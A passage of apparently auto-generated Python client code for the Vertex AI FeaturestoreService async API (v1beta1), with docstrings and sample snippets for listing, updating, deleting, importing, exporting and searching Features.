# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_list_features():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.ListFeaturesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_features(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ListFeaturesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ListFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeatures].
parent (:class:`str`):
                Required. The resource name of the EntityType to list
Features. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.ListFeaturesAsyncPager:
Response message for
[FeaturestoreService.ListFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeatures].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ListFeaturesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_features,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListFeaturesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def update_feature(
self,
request: Optional[
Union[featurestore_service.UpdateFeatureRequest, dict]
] = None,
*,
feature: Optional[gca_feature.Feature] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_feature.Feature:
r"""Updates the parameters of a single Feature.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_update_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
feature = aiplatform_v1beta1.Feature()
feature.value_type = "BYTES"
request = aiplatform_v1beta1.UpdateFeatureRequest(
feature=feature,
)
# Make the request
response = await client.update_feature(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.UpdateFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.UpdateFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.UpdateFeature].
feature (:class:`google.cloud.aiplatform_v1beta1.types.Feature`):
Required. The Feature's ``name`` field is used to
identify the Feature to be updated. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}/features/{feature}``
This corresponds to the ``feature`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Field mask is used to specify the fields to be
                overwritten in the Feature resource by the update. The
fields specified in the update_mask are relative to the
resource, not the full request. A field will be
overwritten if it is in the mask. If the user does not
provide a mask then only the non-empty fields present in
the request will be overwritten. Set the update_mask to
``*`` to override all fields.
Updatable fields:
- ``description``
- ``labels``
- ``disable_monitoring``
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.Feature:
Feature Metadata information that
describes an attribute of an entity
type. For example, apple is an entity
type, and color is a feature that
describes apple.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([feature, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.UpdateFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if feature is not None:
request.feature = feature
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("feature.name", request.feature.name),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_feature(
self,
request: Optional[
Union[featurestore_service.DeleteFeatureRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single Feature.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.DeleteFeatureRequest(
name="name_value",
)
# Make the request
operation = client.delete_feature(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeature].
name (:class:`str`):
                Required. The name of the Feature to be deleted.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}/features/{feature}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def import_feature_values(
self,
request: Optional[
Union[featurestore_service.ImportFeatureValuesRequest, dict]
] = None,
*,
entity_type: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Imports Feature values into the Featurestore from a
        source storage location.
The progress of the import is tracked by the returned
operation. The imported features are guaranteed to be
visible to subsequent read operations after the
operation is marked as successfully done.
If an import operation fails, the Feature values
returned from reads and exports may be inconsistent. If
consistency is required, the caller must retry the same
        import request again and wait until the new operation
returned is marked as successfully done.
There are also scenarios where the caller can cause
inconsistency.
- Source data for import contains multiple distinct
Feature values for the same entity ID and
timestamp.
- Source is modified during an import. This includes
adding, updating, or removing source data and/or
metadata. Examples of updating metadata include but
are not limited to changing storage location, storage
class, or retention policy.
- Online serving cluster is under-provisioned.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_import_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
avro_source = aiplatform_v1beta1.AvroSource()
avro_source.gcs_source.uris = ['uris_value1', 'uris_value2']
feature_specs = aiplatform_v1beta1.FeatureSpec()
feature_specs.id = "id_value"
request = aiplatform_v1beta1.ImportFeatureValuesRequest(
avro_source=avro_source,
feature_time_field="feature_time_field_value",
entity_type="entity_type_value",
                feature_specs=[feature_specs],
)
# Make the request
operation = client.import_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ImportFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ImportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ImportFeatureValues].
entity_type (:class:`str`):
Required. The resource name of the EntityType grouping
the Features for which values are being imported.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entityType}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.ImportFeatureValuesResponse` Response message for
[FeaturestoreService.ImportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ImportFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ImportFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.import_feature_values,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type", request.entity_type),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.ImportFeatureValuesResponse,
metadata_type=featurestore_service.ImportFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def batch_read_feature_values(
self,
request: Optional[
Union[featurestore_service.BatchReadFeatureValuesRequest, dict]
] = None,
*,
featurestore: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Batch reads Feature values from a Featurestore.
This API enables batch reading Feature values, where
each read instance in the batch may read Feature values
of entities from one or more EntityTypes. Point-in-time
correctness is guaranteed for Feature values of each
read instance as of each instance's read timestamp.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_batch_read_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
csv_read_instances = aiplatform_v1beta1.CsvSource()
csv_read_instances.gcs_source.uris = ['uris_value1', 'uris_value2']
destination = aiplatform_v1beta1.FeatureValueDestination()
destination.bigquery_destination.output_uri = "output_uri_value"
entity_type_specs = aiplatform_v1beta1.EntityTypeSpec()
entity_type_specs.entity_type_id = "entity_type_id_value"
entity_type_specs.feature_selector.id_matcher.ids = ['ids_value1', 'ids_value2']
request = aiplatform_v1beta1.BatchReadFeatureValuesRequest(
csv_read_instances=csv_read_instances,
featurestore="featurestore_value",
destination=destination,
                entity_type_specs=[entity_type_specs],
)
# Make the request
operation = client.batch_read_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.BatchReadFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.BatchReadFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchReadFeatureValues].
featurestore (:class:`str`):
Required. The resource name of the Featurestore from
which to query Feature values. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``featurestore`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.BatchReadFeatureValuesResponse` Response message for
[FeaturestoreService.BatchReadFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchReadFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([featurestore])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.BatchReadFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if featurestore is not None:
request.featurestore = featurestore
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.batch_read_feature_values,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("featurestore", request.featurestore),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.BatchReadFeatureValuesResponse,
metadata_type=featurestore_service.BatchReadFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def export_feature_values(
self,
request: Optional[
Union[featurestore_service.ExportFeatureValuesRequest, dict]
] = None,
*,
entity_type: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Exports Feature values from all the entities of a
target EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_export_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
destination = aiplatform_v1beta1.FeatureValueDestination()
destination.bigquery_destination.output_uri = "output_uri_value"
feature_selector = aiplatform_v1beta1.FeatureSelector()
feature_selector.id_matcher.ids = ['ids_value1', 'ids_value2']
request = aiplatform_v1beta1.ExportFeatureValuesRequest(
entity_type="entity_type_value",
destination=destination,
feature_selector=feature_selector,
)
# Make the request
operation = client.export_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ExportFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ExportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ExportFeatureValues].
entity_type (:class:`str`):
Required. The resource name of the EntityType from which
to export Feature values. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.ExportFeatureValuesResponse` Response message for
[FeaturestoreService.ExportFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.ExportFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ExportFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.export_feature_values,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type", request.entity_type),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.ExportFeatureValuesResponse,
metadata_type=featurestore_service.ExportFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def delete_feature_values(
self,
request: Optional[
Union[featurestore_service.DeleteFeatureValuesRequest, dict]
] = None,
*,
entity_type: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Delete Feature values from Featurestore.
The progress of the deletion is tracked by the returned
operation. The deleted feature values are guaranteed to
be invisible to subsequent read operations after the
operation is marked as successfully done.
If a delete feature values operation fails, the feature
values returned from reads and exports may be
inconsistent. If consistency is required, the caller
        must retry the same delete request again and wait until
the new operation returned is marked as successfully
done.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_feature_values():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
select_entity = aiplatform_v1beta1.SelectEntity()
select_entity.entity_id_selector.csv_source.gcs_source.uris = ['uris_value1', 'uris_value2']
request = aiplatform_v1beta1.DeleteFeatureValuesRequest(
select_entity=select_entity,
entity_type="entity_type_value",
)
# Make the request
operation = client.delete_feature_values(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteFeatureValuesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeatureValues].
entity_type (:class:`str`):
Required. The resource name of the EntityType grouping
the Features for which values are being deleted from.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entityType}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.DeleteFeatureValuesResponse` Response message for
[FeaturestoreService.DeleteFeatureValues][google.cloud.aiplatform.v1beta1.FeaturestoreService.DeleteFeatureValues].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteFeatureValuesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_feature_values,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type", request.entity_type),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.DeleteFeatureValuesResponse,
metadata_type=featurestore_service.DeleteFeatureValuesOperationMetadata,
)
# Done; return the response.
return response
async def search_features(
self,
request: Optional[
Union[featurestore_service.SearchFeaturesRequest, dict]
] = None,
*,
location: Optional[str] = None,
query: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.SearchFeaturesAsyncPager:
r"""Searches Features matching a query in a given
project.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_search_features():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.SearchFeaturesRequest(
location="location_value",
)
# Make the request
page_result = client.search_features(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.SearchFeaturesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.SearchFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.SearchFeatures].
location (:class:`str`):
Required. The resource name of the Location to search
Features. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``location`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
query (:class:`str`):
Query string that is a conjunction of field-restricted
queries and/or field-restricted filters.
Field-restricted queries and filters can be combined
using ``AND`` to form a conjunction.
A field query is in the form FIELD:QUERY. This
implicitly checks if QUERY exists as a substring within
Feature's FIELD. The QUERY and the FIELD are converted
to a sequence of words (i.e. tokens) for comparison.
This is done by:
- Removing leading/trailing whitespace and tokenizing
the search value. Characters that are not one of
alphanumeric ``[a-zA-Z0-9]``, underscore ``_``, or
asterisk ``*`` are treated as delimiters for tokens.
``*`` is treated as a wildcard that matches
characters within a token.
- Ignoring case.
- Prepending an asterisk to the first and appending an
asterisk to the last token in QUERY.
A QUERY must be either a singular token or a phrase. A
phrase is one or multiple words enclosed in double
quotation marks ("). With phrases, the order of the
                words is important. Words in the phrase must match
                in order and consecutively.
Supported FIELDs for field-restricted queries:
- ``feature_id``
- ``description``
- ``entity_type_id``
Examples:
- ``feature_id: foo`` --> Matches a Feature with ID
                containing the substring ``foo`` (e.g. ``foo``,
``foofeature``, ``barfoo``).
- ``feature_id: foo*feature`` --> Matches a Feature
                with ID containing the substring ``foo*feature`` (e.g.
``foobarfeature``).
- ``feature_id: foo AND description: bar`` --> Matches
a Feature with ID containing the substring ``foo``
and description containing the substring ``bar``.
Besides field queries, the following exact-match filters
are supported. The exact-match filters do not support
wildcards. Unlike field-restricted queries, exact-match
filters are case-sensitive.
- ``feature_id``: Supports = comparisons.
- ``description``: Supports = comparisons. Multi-token
filters should be enclosed in quotes.
- ``entity_type_id``: Supports = comparisons.
- ``value_type``: Supports = and != comparisons.
- ``labels``: Supports key-value equality as well as
key presence.
- ``featurestore_id``: Supports = comparisons.
Examples:
- ``description = "foo bar"`` --> Any Feature with
description exactly equal to ``foo bar``
- ``value_type = DOUBLE`` --> Features whose type is
DOUBLE.
- ``labels.active = yes AND labels.env = prod`` -->
Features having both (active: yes) and (env: prod)
labels.
- ``labels.env: *`` --> Any Feature which has a label
with ``env`` as the key.
This corresponds to the ``query`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.SearchFeaturesAsyncPager:
Response message for
[FeaturestoreService.SearchFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.SearchFeatures].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([location, query])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.SearchFeaturesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if location is not None:
request.location = location
if query is not None:
request.query = query
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.search_features,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("location", request.location),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.SearchFeaturesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def list_operations(
self,
request: Optional[operations_pb2.ListOperationsRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.ListOperationsResponse:
r"""Lists operations that match the specified filter in the request.
Args:
request (:class:`~.operations_pb2.ListOperationsRequest`):
The request object. Request message for
`ListOperations` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
~.operations_pb2.ListOperationsResponse:
Response message for ``ListOperations`` method.
"""
# Create or coerce a protobuf request object.
# The request isn't a proto-plus wrapped type,
# so it must be constructed via keyword expansion.
if isinstance(request, dict):
request = operations_pb2.ListOperationsRequest(**request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method.wrap_method(
self._client._transport.list_operations,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def get_operation(
self,
request: Optional[operations_pb2.GetOperationRequest] = None,
*,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operations_pb2.Operation:
r"""Gets the latest state of a long-running operation.
Args:
request (:class:`~.operations_pb2.GetOperationRequest`):
The request object. Request message for
`GetOperation` method.
retry (google.api_core.retry.Retry): Designation of what errors,
if any, should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
